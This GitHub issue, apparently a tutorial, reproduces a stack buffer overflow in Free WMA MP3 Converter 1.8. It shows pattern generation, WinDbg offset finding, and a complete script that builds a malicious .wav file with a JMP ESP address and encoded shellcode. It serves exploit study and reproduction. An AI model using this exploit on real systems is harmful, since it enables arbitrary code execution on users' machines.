xinali/articles

Reproducing the FREE WMA MP3 CONVERTER 1.8 buffer overflow vulnerability

xinali opened this issue · 0 comments


Vulnerability overview

Vulnerability source: exploit-db.

First, generate the test string (a cyclic pattern) with the following script:

# encoding: utf-8

import sys
from pwnlib.util.cyclic import cyclic, cyclic_find


def usage():
    print("""
====================================================
        [*] python genseq.py s/g arg
        example:
        generate: python genseq.py g 1000
        search: python genseq.py s abcd
====================================================
        """)


if __name__ == "__main__":
    if len(sys.argv) < 3:
        usage()
        sys.exit(1)

    op = sys.argv[1]
    try:
        if op == 'g':
            # Generate a cyclic (de Bruijn) pattern of the requested length
            gen_len = sys.argv[2]
            print(cyclic(int(gen_len)).decode())
        elif op == 's':
            # Look up the offset of a 4-byte substring inside the pattern
            search_ch = sys.argv[2]
            print(cyclic_find(search_ch))
        else:
            usage()
    except Exception as ex:
        print(ex)
        usage()

Generate a 10000-byte .wav file from the pattern, open the converter and attach WinDbg to it.

Start the conversion; the program crashes.

Locating the vulnerability

Use kb to view the call stack.

The call stack is completely filled with our data, so the overflow length can be determined from EIP:

0:003> .formats(eip)
Evaluate expression:
  Hex:     61657062
  Decimal: 1634037858
  Octal:   14131270142
  Binary:  01100001 01100101 01110000 01100010
  Chars:   aepb
  Time:    Tue Oct 12 04:24:18 2021
  Float:   low 2.64525e+020 high 0
  Double:  8.07322e-315

Search for it with the script above (the Chars field prints the DWORD most-significant byte first, so the bytes as they sit in memory are bpea):

python genseq.py s bpea
4112

This shows that EIP is overwritten once the string is 4112 bytes long. The program performs no length check on the input it is passed, so shellcode can be constructed in the layout
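The offset lookup that the script above delegates to pwntools, reimplemented here as an added example (not code from the original post or from pwntools) so the mechanism is visible: the pattern is a de Bruijn sequence, so every 4-byte window occurs exactly once and the register value alone pins the offset. The eip_offset helper is an assumption of this example; it takes the little-endian DWORD that .formats displayed.

```python
import struct
from string import ascii_lowercase

ALPHABET = ascii_lowercase.encode()
N = 4  # a 32-bit register captures exactly 4 consecutive pattern bytes

def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the lexicographically smallest de Bruijn sequence B(k, n)
    byte by byte (FKM algorithm: Lyndon words in lexicographic order)."""
    k = len(alphabet)
    a = [0] * (k * n)
    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)

def cyclic(length):
    """First `length` bytes of the pattern, i.e. what the fuzz file holds."""
    out = bytearray()
    for b in de_bruijn():
        if len(out) == length:
            break
        out.append(b)
    return bytes(out)

def cyclic_find(subseq, n=N):
    """Offset of an n-byte window in the pattern, or -1 if it never occurs."""
    subseq = bytes(subseq)
    window = bytearray()
    for i, b in enumerate(de_bruijn()):
        window.append(b)
        del window[:-n]  # keep only the last n bytes seen
        if bytes(window) == subseq:
            return i - n + 1
    return -1

def eip_offset(eip_value):
    """Offset that landed in EIP; 0x61657062 is stored little-endian, so
    memory holds b'bpea' although WinDbg's .formats prints 'aepb'."""
    return cyclic_find(struct.pack("<L", eip_value))
```

Running eip_offset(0x61657062) reproduces the 4112 reported by genseq.py.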

poc + eip + nops + shellcode

where poc is 4112 bytes long and eip is the address of a jmp esp found by searching the binary.

Test with the shellcode provided by the exploit-db entry:

import struct


def little_endian(address):
    # Pack a 32-bit address in the byte order it must have in memory
    return struct.pack("<L", address)


poc = b"\x41" * 4112  # filler up to the saved return address (offset 4112)
eip = little_endian(0x0045CD1A)  # 0045CD1A   FFE4  JMP ESP
nops = b"\x90" * 80  # NOP sled in front of the shellcode
shellcode = ("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
# The shellcode is a text literal; latin-1 maps each \xNN escape to that byte
exploit = poc + eip + nops + shellcode.encode("latin-1")
try:
    # Binary mode, so no newline translation corrupts the payload
    with open("bof_WMA MP3 Converter.wav", "wb") as rst:
        rst.write(exploit)
except OSError as ex:
    print("Error:", ex)

The calculator pops up.